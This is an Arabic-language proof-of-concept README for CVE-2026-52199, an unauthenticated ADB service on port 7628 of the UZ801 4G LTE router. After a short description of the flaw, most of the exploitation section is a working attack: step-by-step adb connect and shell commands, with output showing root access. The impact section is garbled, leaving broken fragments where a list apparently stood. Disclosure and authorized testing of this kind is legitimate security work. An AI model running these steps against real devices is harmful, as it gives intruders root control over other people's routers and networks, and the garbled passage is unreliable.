
استغلال إثبات المفهوم لـ CVE-2026-52199: تنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر خدمة ADB المكشوفة على راوتر UZ801 4G LTE. يتضمن تحليل الثغرة، وتقييم الأثر، ودليل استغلال خطوة بخطوة للاختبار الأمني المصرح به.
توجد ثغرة حرجة من نوع التحكم غير الصحيح في الوصول (Incorrect Access Control) في راوتر UZ801_v2.1 4G LTE من نوع Generic OEM (البرنامج الثابت V3.4.3). يقوم الجهاز بشكل غير صحيح بتعريض برنامج خفي غير مصادق عليه لـ Android Debug Bridge (ADB) (/sbin/adbd) على منفذ TCP 7628 للشبكة المجاورة (LAN/WiFi).
يمكن للمهاجم المتصل بالشبكة المحلية للجهاز استغلال هذا الخلل لتجاوز جميع آليات المصادقة، وإنشاء اتصال ADB، وتنفيذ كود تعسفي بصلاحيات الجذر (root).

/sbin/adbdيؤدي استغلال هذه الثغرة إلى اختراق كامل للنظام. يشمل التأثير:
root)لا تتطلب عملية الاستغلال أي أدوات خاصة بخلاف عميل adb القياسي والوصول إلى الشبكة المجاورة.
الخطوة 1: اتصل بشبكة WiFi الخاصة بجهاز التوجيه UZ801 (البوابة الافتراضية عادةً هي 192.168.100.1).
الخطوة 2: افحص الجهاز بحثًا عن المنافذ المفتوحة. سيظهر المنفذ 7628/TCP كمفتوح.
الخطوة 3: من جهاز المهاجم، ابدأ اتصال ADB بالمنفذ غير الموثّق:
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628
الخطوة 4: اطلب صدفة تفاعلية:
$ adb -s 192.168.100.1:7628 shell
الخطوة 5: يصل المهاجم مباشرة إلى صدفة root دون أي مطالبات مصادقة:
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64
لأغراض تعليمية وأبحاث أمنية مصرح بها فقط.
المعلومات وإثبات المفهوم المقدمة في هذا المستودع مخصصة فقط للأغراض التعليمية ولمساعدة تأمين الشبكات. المؤلف (lamaper) غير مسؤول عن أي إساءة استخدام لهذه المعلومات. لا تستخدم هذا الاستغلال ضد أجهزة أو شبكات لا تملكها أو ليس لديك إذن صريح لاختبارها.